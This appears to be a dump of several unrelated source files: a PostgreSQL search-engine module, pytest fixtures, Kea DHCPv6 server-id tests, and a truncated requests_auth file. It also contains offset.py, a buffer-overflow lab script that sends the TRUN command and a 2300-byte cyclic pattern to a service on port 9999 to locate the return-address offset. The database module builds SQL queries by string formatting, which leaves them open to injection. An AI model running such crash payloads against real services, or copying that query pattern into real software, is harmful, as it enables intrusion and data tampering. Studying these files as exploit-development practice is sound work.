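def conv_out(size, kernel=4, stride=2):
    # VALID padding: floor((size - kernel) / stride) + 1
    return (size - kernel) // stride + 1

size = 64
for _ in range(4):           # four stride-2 conv layers in Encoder
    size = conv_out(size)
print(size)                  # 2
print(size * size * 256)     # 1024 -- matches the assert in Encoder
```

Feeding images of any other resolution would trip the assertion, which is worth knowing before swapping in a different camera size.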
c5f91ed3e953d181e409154924d21e93b1a6b034 | 19,645 | py | Python | db_operations.py | JesseDesjardins/SearchEngine | 10eb3051936ac3fdad3b67c02eb1bfd97fd73703 | [
"MIT"
] | 1 | 2021-03-29T08:35:45.000Z | 2021-03-29T08:35:45.000Z | db_operations.py | JesseDesjardins/SearchEngine | 10eb3051936ac3fdad3b67c02eb1bfd97fd73703 | [
"MIT"
] | null | null | null | db_operations.py | JesseDesjardins/SearchEngine | 10eb3051936ac3fdad3b67c02eb1bfd97fd73703 | [
"MIT"
] | null | null | null | import psycopg2
import json
from config import config
# Courses functions
def get_connection():
""" Returns a connection to the database """
conn = None
try:
print("Connecting to the PostgreSQL database...")
conn = psycopg2.connect(**config())
except (Exception, psycopg2.DatabaseError) as error:
print(error)
    if conn is not None: print("Connected!")
return conn
def get_db_version():
""" Used as a donnection test; prints DB version """
# create a cursor
conn = get_connection()
cur = conn.cursor()
# execute a statement
print('PostgreSQL database version:')
cur.execute('SELECT version()')
# display the PostgreSQL database server version
db_version = cur.fetchone()
print(db_version)
# close the communication with the PostgreSQL
cur.close()
def insert_courses_corpus_into_db(json_file):
""" Inserts the courses corpus JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_command = 'INSERT INTO corpus_u_of_o_courses.documents(docid, title, description) values '
with open(json_file) as file:
data = json.load(file)
for doc in data['documents']:
doc_id = doc['docId']
title = doc['title'] if doc['title'] != "" else None
description = doc['description'].replace("'", "''") if doc['description'] != "" else None
insert_command = insert_command + """({0}, '{1}', '{2}'),""".format(doc_id, title, description)
insert_command = insert_command[:-1] + ';' # Removes trailing comma
try:
print('Inserting courses into db...')
cursor.execute(insert_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def insert_courses_dictionary_into_db(json_file):
""" Inserts the courses dictionary JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_command = 'INSERT INTO corpus_u_of_o_courses.dictionary(word, docid) values '
with open(json_file) as infile:
data = json.load(infile)
for doc in data['words']:
insert_command = insert_command + """('{0}', {1}),""".format(doc['word'], doc['docid'])
insert_command = insert_command[:-1] + ';' # Removes trailing comma
try:
print('Inserting courses dictionary into db...')
cursor.execute(insert_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def insert_courses_inverted_index_into_db(json_file):
""" Inserts the courses inverted index JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_postings_command = 'INSERT INTO corpus_u_of_o_courses.inverted_matrix_postings(posting_id, doc_id, term_freq) values '
insert_terms_command = 'INSERT INTO corpus_u_of_o_courses.inverted_matrix_terms(term_id, term, doc_freq) values '
insert_foreign_keys_command = 'INSERT INTO corpus_u_of_o_courses.inverted_matrix_terms_postings(term_id, posting_id) values '
postings_id = 0
term_id = 0
data = {}
with open(json_file) as infile:
data = json.load(infile)
for term in data['index']:
term_id += 1
insert_terms_command = insert_terms_command + "({0}, '{1}', {2}),".format(term_id, term['term'], term['doc_freq'])
term_postings = []
for posting in term['postings_list']:
postings_id += 1
insert_postings_command = insert_postings_command + "({0}, {1}, {2}),".format(postings_id, posting[0], posting[1])
term_postings.append(postings_id)
for posting_id in term_postings:
insert_foreign_keys_command = insert_foreign_keys_command + "({0}, {1}),".format(term_id, posting_id)
insert_terms_command = insert_terms_command[:-1] + ';'
insert_postings_command = insert_postings_command[:-1] + ';'
insert_foreign_keys_command = insert_foreign_keys_command[:-1] + ';'
try:
print('Inserting inverted index data into db...')
cursor.execute(insert_terms_command)
cursor.execute(insert_postings_command)
cursor.execute(insert_foreign_keys_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def retrieve_courses_documents(doc_ids):
""" Retrieves the course documents associated with the given list of IDs
Return
------
list of tuple
A list of tuples of docid, title and description
"""
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT docid, title, description FROM corpus_u_of_o_courses.documents WHERE docid IN ('
for id in doc_ids:
select_command = select_command + '{},'.format(id)
if select_command[-1] == ',':
select_command = select_command[:-1] + ');'
else:
select_command = select_command + ');'
try:
cursor.execute(select_command)
docs = cursor.fetchall()
except(Exception) as error:
docs = None
print(error)
return docs
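The `IN` clauses in this module are assembled by interpolating raw values into the SQL string, which is fragile and open to SQL injection. psycopg2 lets the driver do the quoting when values are passed separately from the statement. A sketch of the alternative (helper name `build_select_documents` is mine; only the pure-string query construction is shown so it runs and can be checked without a live database — `cursor.execute(query, params)` would execute it):

```python
def build_select_documents(doc_ids):
    # One %s placeholder per id; psycopg2 substitutes and quotes the values.
    placeholders = ", ".join(["%s"] * len(doc_ids))
    query = ("SELECT docid, title, description "
             "FROM corpus_u_of_o_courses.documents "
             "WHERE docid IN ({});").format(placeholders)
    return query, list(doc_ids)

query, params = build_select_documents([3, 7, 42])
print(query)
# SELECT docid, title, description FROM corpus_u_of_o_courses.documents WHERE docid IN (%s, %s, %s);
print(params)  # [3, 7, 42]
```

Only the placeholder string is formatted into the SQL; the ids themselves travel through the driver's parameter path.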
def retrieve_courses_documents_not(doc_ids):
""" Retrieves all the course documents not associated with the given list of IDs """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT docid, title, description FROM corpus_u_of_o_courses.documents WHERE docid NOT IN ('
for id in doc_ids:
select_command = select_command + '{},'.format(id)
select_command = select_command[:-1] + ');'
try:
cursor.execute(select_command)
docs = cursor.fetchall()
cursor.close()
except(Exception) as error:
docs = None
print(error)
return docs
def retrieve_courses_doc_ids_from_term(term):
""" Returns all doc_ids for docs where term is present """
connection = get_connection()
cursor = connection.cursor()
select_command = """SELECT p.doc_id from corpus_u_of_o_courses.inverted_matrix_terms t,
corpus_u_of_o_courses.inverted_matrix_postings p,
corpus_u_of_o_courses.inverted_matrix_terms_postings tp
WHERE t.term = '{0}' AND tp.term_id = t.term_id AND p.posting_id = tp.posting_id;""".format(term)
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_ids = None
print(error)
    return [doc_id[0] for doc_id in doc_ids] # doc_ids is a list of 1-tuples of ints; simplify to a list of ints
def retrieve_courses_doc_ids_from_terms(terms):
""" Returns all doc_ids for docs where any terms in the list are present """
connection = get_connection()
cursor = connection.cursor()
select_command = """SELECT p.doc_id from corpus_u_of_o_courses.inverted_matrix_terms t,
corpus_u_of_o_courses.inverted_matrix_postings p,
corpus_u_of_o_courses.inverted_matrix_terms_postings tp
WHERE t.term in ("""
for term in terms:
select_command = select_command + "'{}',".format(term)
if select_command[-1] == ',':
select_command = select_command[:-1] + ') AND tp.term_id = t.term_id AND p.posting_id = tp.posting_id;'
else:
select_command = select_command + ') AND tp.term_id = t.term_id AND p.posting_id = tp.posting_id;'
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_ids = None
print(error)
    return [doc_id[0] for doc_id in doc_ids] # doc_ids is a list of 1-tuples of ints; simplify to a list of ints
def retrieve_courses_doc_ids_not_from_term(term):
""" Returns all doc_ids for docs where term is not present """
doc_ids = retrieve_courses_doc_ids_from_term(term)
connection = get_connection()
cursor = connection.cursor()
select_command = "SELECT docid from corpus_u_of_o_courses.documents WHERE docid NOT IN ("
for id in doc_ids:
select_command = select_command + '{},'.format(id)
select_command = select_command[:-1] + ');'
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_ids = None
print(error)
    return [doc_id[0] for doc_id in doc_ids] # doc_ids is a list of 1-tuples of ints; simplify to a list of ints
def retrieve_courses_doc_ids_not_from_set(doc_ids):
""" Returns all doc_ids for docs that aren't associated with doc_ids """
connection = get_connection()
cursor = connection.cursor()
select_command = "SELECT docid from corpus_u_of_o_courses.documents WHERE docid NOT IN ("
for id in doc_ids:
select_command = select_command + '{},'.format(id)
select_command = select_command[:-1] + ');'
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_ids = None
print(error)
return [doc_id[0] for doc_id in doc_ids] # doc_ids is list of tuples of 1 int; simplify to a list of ints
def retrieve_courses_all_terms():
""" Retrieves a list of all terms from the inverted matrix index """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT term FROM corpus_u_of_o_courses.inverted_matrix_terms;'
try:
cursor.execute(select_command)
terms = cursor.fetchall()
except(Exception) as error:
terms = None
print(error)
return [term[0] for term in terms] # terms is list of tuples of 1 string; simplify to a list of strings
def retrieve_courses_all_terms_and_doc_freqs():
""" Retrieves a list of tuples all terms and their doccument frequencies from the inverted matrix index """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT term, doc_freq FROM corpus_u_of_o_courses.inverted_matrix_terms;'
try:
cursor.execute(select_command)
pairs = cursor.fetchall()
except(Exception) as error:
pairs = None
print(error)
return pairs
def retrieve_courses_all_documents_count():
""" Retrieves a count of all documents in the corpus """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT COUNT(*) FROM corpus_u_of_o_courses.documents;'
try:
cursor.execute(select_command)
count = cursor.fetchone()
except(Exception) as error:
count = None
print(error)
return count[0]
def retrieve_courses_all_terms_count():
""" Retrieves a count of all unique terms in the corpus """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT COUNT(*) FROM corpus_u_of_o_courses.inverted_matrix_terms;'
try:
cursor.execute(select_command)
count = cursor.fetchone()
except(Exception) as error:
count = None
print(error)
return count[0]
def retrieve_courses_all_document_ids():
""" Retrieves all document ids in the corpus """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT docid FROM corpus_u_of_o_courses.documents;'
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
except(Exception) as error:
doc_ids = None
print(error)
return [doc_id[0] for doc_id in doc_ids]
# Reuters Functions
def insert_reuters_corpus_into_db(json_file):
""" Inserts the reuters documents corpus JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_command = 'INSERT INTO corpus_reuters.documents(docid, title, body, topics) values '
with open(json_file) as file:
data = json.load(file)
for doc in data['documents']:
doc_id = doc['docId']
title = doc['title'].replace("'", "''") if doc['title'] != "" else None
body = doc['body'].replace("'", "''") if doc['body'] != "" else None
topics = doc['topics'].replace("'", "''") if doc['topics'] != "" else None
insert_command = insert_command + """({0}, '{1}', '{2}', '{3}'),""".format(doc_id, title, body, topics)
insert_command = insert_command[:-1] + ';' # Removes trailing comma
try:
print('Inserting documents into db...')
cursor.execute(insert_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def insert_reuters_dictionary_into_db(json_file):
""" Inserts the reuters dictionary JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_command = 'INSERT INTO corpus_reuters.dictionary(word, docid) values '
with open(json_file) as infile:
data = json.load(infile)
for doc in data['words']:
insert_command = insert_command + """('{0}', {1}),""".format(doc['word'], doc['docid'])
insert_command = insert_command[:-1] + ';' # Removes trailing comma
try:
print('Inserting reuters dictionary into db...')
cursor.execute(insert_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def insert_reuters_inverted_index_into_db(json_file):
""" Inserts the reuters inverted index JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
print("Generating insert query...")
insert_index_command = 'INSERT INTO corpus_reuters.inverted_matrix_terms_postings(term_id, term, doc_freq, doc_id_term_freq_tuple) values '
postings_id = 0
term_id = 0
data = {}
with open(json_file) as infile:
data = json.load(infile)
for term in data['index']:
term_id += 1
insert_index_command = insert_index_command + "({0}, '{1}', {2}, '{{".format(term_id, term['term'], term['doc_freq'])
term_postings = []
for posting in term['postings_list']:
insert_index_command = insert_index_command + """{{"{0}", "{1}"}},""".format(posting[0], posting[1])
insert_index_command = insert_index_command[:-1] + "}')," # closes array insert
insert_index_command = insert_index_command[:-1] + ";" # removes trailing comma
try:
print('Inserting inverted index data into db...')
cursor.execute(insert_index_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def retrieve_reuters_documents(doc_ids):
    """ Retrieves the reuters documents associated with the given list of IDs

    Return
    ------
    list of tuple
        A list of tuples of docid, title, body and topics
    """
    connection = get_connection()
    cursor = connection.cursor()
    select_command = 'SELECT docid, title, body, topics FROM corpus_reuters.documents WHERE docid IN ('
    for id in doc_ids:
        select_command = select_command + '{},'.format(id)
    if select_command[-1] == ',':
        select_command = select_command[:-1] + ');'
    else:
        select_command = select_command + ');'
    try:
        cursor.execute(select_command)
        docs = cursor.fetchall()
    except Exception as error:
        docs = None
        print(error)
    return docs
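The `IN (...)` clause above is assembled with per-item concatenation and a conditional trim of the trailing comma. The same clause can be built in one step with `str.join` (illustrative IDs taken from the `__main__` call in this module):

```python
doc_ids = [133, 1]
placeholders = ', '.join(str(doc_id) for doc_id in doc_ids)
select_command = (
    'SELECT docid, title, body, topics '
    'FROM corpus_reuters.documents WHERE docid IN ({});'.format(placeholders)
)
```

Note that, like the original, this still fails on an empty `doc_ids` list, since `IN ()` is not valid SQL; an early `if not doc_ids: return []` guard would cover that case.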
def retrieve_reuters_all_terms():
    """ Retrieves a list of all terms from the inverted matrix index """
    connection = get_connection()
    cursor = connection.cursor()
    select_command = 'SELECT term FROM corpus_reuters.inverted_matrix_terms;'
    try:
        cursor.execute(select_command)
        terms = cursor.fetchall()
    except Exception as error:
        terms = None
        print(error)
    if terms is None:
        return None
    return [term[0] for term in terms]  # terms is a list of 1-string tuples; simplify to a list of strings
def retrieve_reuters_doc_ids_from_terms(terms):
    """ Returns all doc_ids for docs where any terms in the list are present """
    connection = get_connection()
    cursor = connection.cursor()
    select_command = "SELECT doc_id_term_freq_tuple from corpus_reuters.inverted_matrix_terms_postings WHERE term in ("
    for term in terms:
        select_command = select_command + "'{}',".format(term)
    if select_command[-1] == ',':
        select_command = select_command[:-1] + ');'
    else:
        select_command = select_command + ');'
    try:
        cursor.execute(select_command)
        doc_id_term_freq_tuples = cursor.fetchall()
        cursor.close()
    except Exception as error:
        doc_id_term_freq_tuples = None
        print(error)
    doc_ids = []
    for tpl in doc_id_term_freq_tuples or []:
        for inner_tpl in tpl:
            for more_inner_tpl in inner_tpl:
                doc_ids.append(more_inner_tpl[0])
    return doc_ids
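The triple loop above unwraps the shape `fetchall()` returns for this query: each row is a 1-tuple wrapping the postings array, and each posting is a (doc_id, term_freq) pair. A flat comprehension over the same (here mocked) shape makes the unwrapping explicit:

```python
# Mock of cursor.fetchall() output: rows of 1-tuples holding postings arrays.
rows = [([[12, 3], [40, 1]],), ([[7, 2]],)]
# Unpack the 1-tuple per row, then take the doc_id from each posting.
doc_ids = [posting[0] for (postings,) in rows for posting in postings]
```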
def retrieve_reuters_doc_ids_not_from_set(doc_ids):
    """ Returns all doc_ids for docs that aren't associated with doc_ids """
    connection = get_connection()
    cursor = connection.cursor()
    select_command = "SELECT docid from corpus_reuters.documents WHERE docid NOT IN ("
    for id in doc_ids:
        select_command = select_command + '{},'.format(id)
    select_command = select_command[:-1] + ');'
    try:
        cursor.execute(select_command)
        doc_ids = cursor.fetchall()
        cursor.close()
    except Exception as error:
        doc_ids = None
        print(error)
    if doc_ids is None:
        return None
    return [doc_id[0] for doc_id in doc_ids]  # doc_ids is a list of 1-int tuples; simplify to a list of ints
def retrieve_reuters_all_documents_count():
    """ Retrieves a count of all documents in the corpus """
    connection = get_connection()
    cursor = connection.cursor()
    select_command = 'SELECT COUNT(*) FROM corpus_reuters.documents;'
    try:
        cursor.execute(select_command)
        count = cursor.fetchone()
    except Exception as error:
        count = None
        print(error)
    return count[0] if count else None
def retrieve_reuters_all_terms_count():
    """ Retrieves a count of all unique terms in the corpus """
    connection = get_connection()
    cursor = connection.cursor()
    select_command = 'SELECT COUNT(*) FROM corpus_reuters.inverted_matrix_terms_postings;'
    try:
        cursor.execute(select_command)
        count = cursor.fetchone()
    except Exception as error:
        count = None
        print(error)
    return count[0] if count else None
def retrieve_reuters_all_terms_and_doc_freqs():
    """ Retrieves a list of tuples of all terms and their document frequencies from the inverted matrix index """
    connection = get_connection()
    cursor = connection.cursor()
    select_command = 'SELECT term, doc_freq FROM corpus_reuters.inverted_matrix_terms_postings;'
    try:
        cursor.execute(select_command)
        pairs = cursor.fetchall()
    except Exception as error:
        pairs = None
        print(error)
    return pairs
if __name__ == "__main__":
    get_db_version()
    # insert_reuters_dictionary_into_db("reuters_dictionary.json")
    # insert_reuters_inverted_index_into_db("reuters_inverted_index.json")
    print(retrieve_reuters_documents([133, 1]))
# File: conftest.py (repo: DocTocToc/silver, license: Apache-2.0)
import pytest
from silver.fixtures.pytest_fixtures import * # NOQA
pytest.register_assert_rewrite('silver.tests.api.specs.document_entry')
pytest.register_assert_rewrite('silver.tests.api.specs.utils')
#!/usr/bin/env python3
# File: offset.py (repo: jiro38/Buffer-Overflows, license: MIT)
import socket
# only need socket this time

ip = '10.10.83.199'
port = 9999
# these should look familiar

# 2300-byte pattern from msf-pattern_create -l 2300
pattern = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2"
           "Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy")

string = "TRUN /.:/ " + pattern
# send it all, should look familiar
try:
    with socket.socket() as s:
        s.connect((ip, port))
        print("sending pattern")
        s.send(bytes(string, 'latin-1'))
except OSError:
    print("failed to connect")
# exception handling like a hacker
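The pattern above is the cyclic sequence produced by `msf-pattern_create`: triplets of uppercase letter, lowercase letter, digit, so any 4-byte slice is unique and its offset can be recovered from the crashed EIP value. A small sketch reproducing both `msf-pattern_create` and `msf-pattern_offset` for this alphabet (standalone helpers, not part of the exploit script):

```python
from string import ascii_uppercase, ascii_lowercase, digits


def pattern_create(length):
    """Build the msf-style cyclic pattern (Aa0Aa1...), truncated to length."""
    out = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return ''.join(out)[:length]
    return ''.join(out)[:length]


def pattern_offset(needle, length=2300):
    """Return the offset of needle inside the pattern, like msf-pattern_offset."""
    return pattern_create(length).find(needle)
```

For instance, if the debugger shows EIP overwritten with the bytes of `'Aa5A'`, `pattern_offset('Aa5A')` recovers the distance from the start of the buffer to the saved return address.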
# File: tests/dhcpv6/kea_only/test_serverid.py (repo: shawnmullaney/forge, license: 0BSD)
"""Configure Kea's server-id."""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_msg
import srv_control
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.kea_only
@pytest.mark.server_id
def test_v6_server_id_llt():
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    srv_control.config_srv_id('LLT', '00:01:00:02:52:7b:a8:f0:08:00:27:58:f1:e8')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_option_content('Response',
                                          '1',
                                          'NOT ',
                                          'duid',
                                          '00:01:00:01:52:7b:a8:f0:08:00:27:58:f1:e8')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_option_content('Response',
                                          '2',
                                          None,
                                          'duid',
                                          '00:01:00:02:52:7b:a8:f0:08:00:27:58:f1:e8')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.kea_only
@pytest.mark.server_id
def test_v6_server_id_en():
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    srv_control.config_srv_id('EN', '00:02:00:00:09:BF:87:AB:EF:7A:5B:B5:45')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '2')
    # Response option 2 MUST contain duid 00:02:00:00:09:BF:87:AB:EF:7A:5B:B5:45.
    srv_msg.response_check_include_option('Response', None, '1')
    # Response option 1 MUST NOT contain duid 00:02:00:00:09:BF:87:AB:EF:7A:5B:B5:45.
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.kea_only
@pytest.mark.server_id
def test_v6_server_id_ll():
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    srv_control.config_srv_id('LL', '00:03:00:01:ff:ff:ff:ff:ff:01')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_option_content('Response',
                                          '2',
                                          None,
                                          'duid',
                                          '00:03:00:01:ff:ff:ff:ff:ff:01')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_option_content('Response',
                                          '1',
                                          'NOT ',
                                          'duid',
                                          '00:03:00:01:ff:ff:ff:ff:ff:01')
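The server-id strings configured above follow the DHCPv6 DUID encodings (RFC 8415): the first two octets carry the DUID type, where 1 is DUID-LLT, 2 is DUID-EN, and 3 is DUID-LL. A quick standalone sanity check of the values used in these tests (not part of the forge framework):

```python
def duid_type(duid):
    # The DUID type is the big-endian integer in the first two octets.
    octets = duid.split(':')
    return int(octets[0] + octets[1], 16)


assert duid_type('00:01:00:02:52:7b:a8:f0:08:00:27:58:f1:e8') == 1  # DUID-LLT
assert duid_type('00:02:00:00:09:BF:87:AB:EF:7A:5B:B5:45') == 2     # DUID-EN
assert duid_type('00:03:00:01:ff:ff:ff:ff:ff:01') == 3              # DUID-LL
```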
# File: challanges/queue_with_stacks/conftest.py (repo: Patricia888/data-structures-and-algorithms, license: MIT)
import pytest
from .queue_with_stacks import Queue


@pytest.fixture
def empty_queue():
    return Queue()


@pytest.fixture
def short_queue():
    return Queue([1, 2, 3, 4])


@pytest.fixture
def long_queue():
    return Queue([10, 20, 30, 40, 50, 60, 70, 80])
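The `Queue` class under test lives in `queue_with_stacks.py`, which is not part of this file. A minimal sketch of the classic two-stack queue these fixtures presumably exercise (the constructor signature accepting an optional iterable is inferred from the fixtures; method names are assumptions):

```python
class Queue:
    """FIFO queue backed by two LIFO stacks (plain lists)."""

    def __init__(self, values=None):
        self._in = []    # receives enqueued values
        self._out = []   # holds reversed values, ready to dequeue
        for value in values or []:
            self.enqueue(value)

    def enqueue(self, value):
        self._in.append(value)

    def dequeue(self):
        if not self._out:
            # Amortized O(1): transfer only when the out-stack runs dry.
            while self._in:
                self._out.append(self._in.pop())
        if not self._out:
            raise IndexError('dequeue from empty queue')
        return self._out.pop()
```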
# File: requests_auth/authentication.py (repo: Simon-Lessage/requests_auth, license: MIT)
import sys
from hashlib import sha512
import uuid
import requests
import requests.auth
import warnings

from requests_auth import oauth2_authentication_responses_server, oauth2_tokens
from requests_auth.errors import *

if sys.version_info.major > 2:
    # Python 3
    from urllib.parse import parse_qs, urlsplit, urlunsplit, urlencode
else:
    # Python 2
    from urllib import urlencode
    from urlparse import parse_qs, urlsplit, urlunsplit
def _add_parameters(initial_url, extra_parameters):
    """
    Add parameters to an URL and return the new URL.

    :param initial_url:
    :param extra_parameters: dictionary of parameters name and value.
    :return: the new URL containing parameters.
    """
    scheme, netloc, path, query_string, fragment = urlsplit(initial_url)
    query_params = parse_qs(query_string)

